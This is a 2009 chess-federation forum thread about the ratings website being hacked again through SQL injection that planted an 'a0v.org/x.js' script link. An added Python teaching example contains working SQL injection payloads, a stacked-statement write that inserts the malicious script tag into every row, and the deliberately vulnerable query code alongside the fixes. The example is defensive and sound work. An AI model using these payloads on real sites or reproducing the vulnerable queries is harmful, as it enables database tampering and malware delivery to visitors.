CFC Website - Hacked Again ( New ) !


    I thought these two prior posts needed to be brought to all members' attention, as they are a new warning about entering the ratings part of the CFC website! EKG apparently did clean the last infection (or didn't), but now it has been hacked anew. So I am reposting the two posts:

    Originally posted by Egidijus Zeromskis:
    Sorry to say, but it seems that the site (rating part) was hacked again.

    Now it has a link to "a0v.org/x.js"

    Posted by Steve Karpik:

    This is very sad. There are two possibilities. Either the contractors hired by the CFC to clean the database of infected strings didn't do a very good job. Or equally as bad they didn't implement a filter on input data to prevent further injection attacks. In either case, the CFC web site is still in bad shape.

    Some browsers like Chrome and Firefox will warn you not to visit the CFC web site. Internet Explorer won't do you that service. For the time being, I would recommend that CFC members don't query the web site for their ratings. After conducting a limited and unscientific survey of the CFC database, it seems that only some portion of the database has been infected but that's scant comfort if the data you're looking up is polluted with links to malware.

    It looks right now that a fully patched computer will block the malware that is being distributed through the link to "a0v.org/x.js"; however, it is probably best to be safe rather than sorry.

    As of mid-August, over 55,000 web sites worldwide had been compromised by this attack. That doesn't excuse the fact that the CFC web site is a mess -- it just shares its mess with 55,000 other badly maintained web sites.

    I'm sure the executive will have a statement on this shortly.

    Bob

  • #2

    Bob: question for IT experts: Why was the CFC forum site not hacked? Was it ever? The CFC forum site is ChessTalk / Parlons Échecs - Powered by vBulletin. Does that fact make it immune to attacks? What are they using re IT language/system wise? Please remember I know nothing about this technical stuff. Just wondering.

    Wilf Ferner



    • #3

      Bob: here is an alternate idea for the CFC to consider re troublesome website:

      Create an official CFC blog. Blogs don't cost much. Ask some of the bloggers on the list "Canadian Chess Blogs". A blog can be linked to an existing website or you can set up and use the blog as your website. Blogs are good for keeping in touch with members, provide useful info like GLs, etc., and help attract visitors to the website because blogs can be interactive (replay games, show puzzles, etc.).


      Wilf Ferner



      • #4

        Hi Wilf:

        I have to leave all this techie stuff to others - hopefully one of the executive will see your posting.

        Bob



        • #5

          Originally posted by Wilf Ferner:
          Bob: question for IT experts: Why was the CFC forum site not hacked? Was it ever? The CFC forum site is ChessTalk / Parlons Échecs - Powered by vBulletin. Does that fact make it immune to attacks? What are they using re IT language/system wise? Please remember I know nothing about this technical stuff. Just wondering.

          Wilf Ferner
          In order to avoid attacks you have to ensure that all patches and updates are applied to your systems and software. This will not stop infections but will reduce the window of vulnerability to the period between when an exploit is discovered and a patch or update is available that addresses that vulnerability.

          The CFC forum site uses newer technology and from what Bob Gillanders wrote was constantly being patched and backed up by Vincent Chow so it is probably up to date on security patches and updates at least up to the date that the CFC got rid of that effective team which turned around the CFC business operations.

          A good webhosting company will typically do much of that for you. If their hosting platform gets hacked it will typically affect hundreds or thousands of websites so they will tend to keep everything up to date.

          If the CFC keeps things hosted the way it is now I can guarantee that any new site will be hacked. It is inevitable. To date I haven't had any website that I have been involved in maintaining hacked despite having a number of psycho internet stalkers with access to and familiarity with all of the state of the art hacker tools (not that they are terribly bright but many of the tools make it easy for dumb people to hack sites and computers). Most of this is due to using professional hosting services that don't drop the ball and also keeping a low profile so that the stalkers don't know which websites are mine aside from vanity sites (which haven't been hacked either).

          Vladimir Drkulec
          Last edited by Vlad Drkulec; Monday, 21st September, 2009, 11:14 PM.



          • #6

            Actually, the forum site is completely separate and managed/maintained by me, not the office. It does use newer technology (PHP and MySQL), and it uses an older version of vB. I'm not exactly sure why it hasn't been hacked and Chesstalk has (twice I think?) even though CT uses a newer version of vB. (CT has been updated since the hacks so those vulnerabilities were closed).
            Christopher Mallon
            FIDE Arbiter



            • #7

              Originally posted by Christopher Mallon:
              Actually, the forum site is completely separate and managed/maintained by me, not the office. It does use newer technology (PHP and MySQL), and it uses an older version of vB. I'm not exactly sure why it hasn't been hacked and Chesstalk has (twice I think?) even though CT uses a newer version of vB. (CT has been updated since the hacks so those vulnerabilities were closed).
              From my understanding of what people have said, the attack was based on some kind of SQL injection vulnerability so the use of an up to date MySQL database implementation probably precludes this line of attack for now.

              Vladimir Drkulec



              • #8

                The database doesn't, but the front end (i.e. vB) does. It's all about filtering what gets inserted into the database.

                If they wanted to be really nasty, they could just insert a KILL statement and poof goes the whole database just like that. Which is why I agree that the CFC is being randomly targeted and not someone going after them on purpose.
                Christopher Mallon
                FIDE Arbiter

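The thread's diagnosis (post #7: "some kind of SQL injection vulnerability"; post #8: "filtering what gets inserted into the database"; Steve Karpik's "survey" of the database and the contractors' job of "cleaning the database of infected strings") put into working form. This is an added example and is not code from the CFC site, from EKG, or from vBulletin. It runs in Python over an in-memory SQLite table with an assumed three-column schema and constructed rows; the two attacker strings are constructed as well, and the only detail taken from the thread is the `a0v.org/x.js` script tag. The vulnerable write path uses `executescript()` to model a database driver that accepts stacked statements (the 2009 mass injections worked that way); plain `execute()` in the `sqlite3` module refuses a second statement, which is one reason a PHP/MySQL site whose driver does the same may be hit less hard by the identical payload. The example shows the string-spliced query that leaks or rewrites every row, the bound-parameter version that confines the same input to one value in one field, the survey-and-clean pass, and HTML-escaping on output, which is the control that keeps a stored tag from ever executing regardless of what reached the database.

```python
import html
import re
import sqlite3

# Constructed sample rows for the example; they are not the CFC's data.
SAMPLE_PLAYERS = [
    (1, "Alice Example", 2105),
    (2, "Bob Sample", 1850),
    (3, "Carol Test", 1990),
]

# The kind of tag the thread reports finding in the ratings pages.
INJECTED_TAG = '<script src="http://a0v.org/x.js"></script>'
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def build_db():
    """In-memory stand-in for a ratings table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE players (id INTEGER PRIMARY KEY, name TEXT, rating INTEGER)")
    conn.executemany("INSERT INTO players VALUES (?, ?, ?)", SAMPLE_PLAYERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """'Before': the user-supplied name is spliced into the SQL text."""
    sql = "SELECT id, name, rating FROM players WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """'After': the name is bound as a parameter, so it can only ever be a value."""
    return conn.execute(
        "SELECT id, name, rating FROM players WHERE name = ?", (name,)
    ).fetchall()


def update_name_vulnerable(conn, player_id, new_name):
    """'Before' write path. executescript() accepts stacked statements, which is
    what lets one injected request rewrite every row of the table."""
    conn.executescript(
        "UPDATE players SET name = '" + new_name + "' WHERE id = " + str(player_id) + ";"
    )


def update_name_safe(conn, player_id, new_name):
    """'After' write path: one statement, both inputs bound."""
    conn.execute("UPDATE players SET name = ? WHERE id = ?", (new_name, int(player_id)))
    conn.commit()


def find_polluted(conn):
    """The 'survey' step: ids of rows whose name column carries a <script> tag."""
    rows = conn.execute("SELECT id, name FROM players ORDER BY id").fetchall()
    return [pid for pid, name in rows if SCRIPT_TAG.search(name)]


def clean_polluted(conn):
    """The 'clean the database of infected strings' step. Returns rows changed."""
    changed = 0
    for pid, name in conn.execute("SELECT id, name FROM players").fetchall():
        stripped = SCRIPT_TAG.sub("", name)
        if stripped != name:
            conn.execute("UPDATE players SET name = ? WHERE id = ?", (stripped, pid))
            changed += 1
    conn.commit()
    return changed


def render_name(name):
    """Output encoding: whatever is stored, the browser receives text, not markup."""
    return html.escape(name, quote=True)


# Attacker-controlled strings (constructed for the example).
READ_PAYLOAD = "' OR '1'='1"
WRITE_PAYLOAD = (
    "x' WHERE id = 0; UPDATE players SET name = name || '" + INJECTED_TAG + "'; --"
)


def demo():
    """Run both paths against the same payloads and return what each one did."""
    conn = build_db()
    out = {}
    out["vuln_read_rows"] = len(lookup_vulnerable(conn, READ_PAYLOAD))  # every row leaks
    out["safe_read_rows"] = len(lookup_safe(conn, READ_PAYLOAD))  # nothing matches

    update_name_vulnerable(conn, 2, WRITE_PAYLOAD)
    out["polluted_after_vuln_write"] = find_polluted(conn)  # whole table, not just row 2
    out["cleaned"] = clean_polluted(conn)
    out["polluted_after_clean"] = find_polluted(conn)

    update_name_safe(conn, 2, WRITE_PAYLOAD)
    out["polluted_after_safe_write"] = find_polluted(conn)  # only row 2, stored as inert text
    stored = conn.execute("SELECT name FROM players WHERE id = 2").fetchone()[0]
    out["rendered"] = render_name(stored)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two things worth noticing in the output. First, the vulnerable write plants the tag in all three rows even though the request named only row 2, which is the shape of the "partial but widespread" infection the survey in post #1 describes. Second, the safe write stores the same payload as a literal name, so a scan still flags that one row; the injected string is then a data-quality problem rather than a code-execution one, and `render_name()` is what guarantees it stays that way. An input filter that only looks for `<script` would miss an encoded or split payload, so the durable fix is the bound parameters plus escaping on output, not the filter alone.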


                • #9

                  Kevin Spraggett's blog has an amusing take on all this today :)

                  ... Maybe I'm just groggy from waking up though, but I think he just makes fun of everyone (Except me, for once :() without actually saying what the CFC should do now.
                  Christopher Mallon
                  FIDE Arbiter



                  • #10

                    Bob, I am an objective observer to these technical threads with a ton of experience in software consulting. I am not 100% familiar with some of the newer tools but my experience working with every variety of software consultant / programmer / etc. reminds me of the following:

                    1. Many (not all) technical people get enamoured with new software tools and often with specific vendors. For example, in the 1990's Microsoft dominated several markets and yet there were a ton of techies who hated Microsoft for no real reason, just an emotional one. This tends to cloud decisions sometimes.

                    2. Database technology hasn't fundamentally changed in twenty years. The main changes would be interfaces (e.g. GUI & Internet), integration with new tools, and performance upgrades.

                    3. It disturbs me that almost all of the advice being accepted is from a company directly benefitting from the advice. In fact, recent events suggest that company may be average at best in this area, but I add this might be in CFC's budget range. The prior roles of some in the CFC itself during the CFC meltdown are also a huge red flag.

                    4. Some of the advice offered by others on here is far too technical and tools oriented. You need an IT person with a business focus. What is important right now is reliability, cost efficiency, and whatever works, don't fix/change it. Make sure procedures of staff are documented mini-handbook style. This can be done by volunteers or the staff itself if possible.

                    In short, get back to a business focus and it is possible to find this in the IT world. The real problem is you have a very small budget (10k, 20k is very small really). The danger is by paying a smaller amount you get nothing lasting and have to repay again every few years.

                    Just my two cents.
                    Last edited by Duncan Smith; Tuesday, 22nd September, 2009, 01:59 PM.
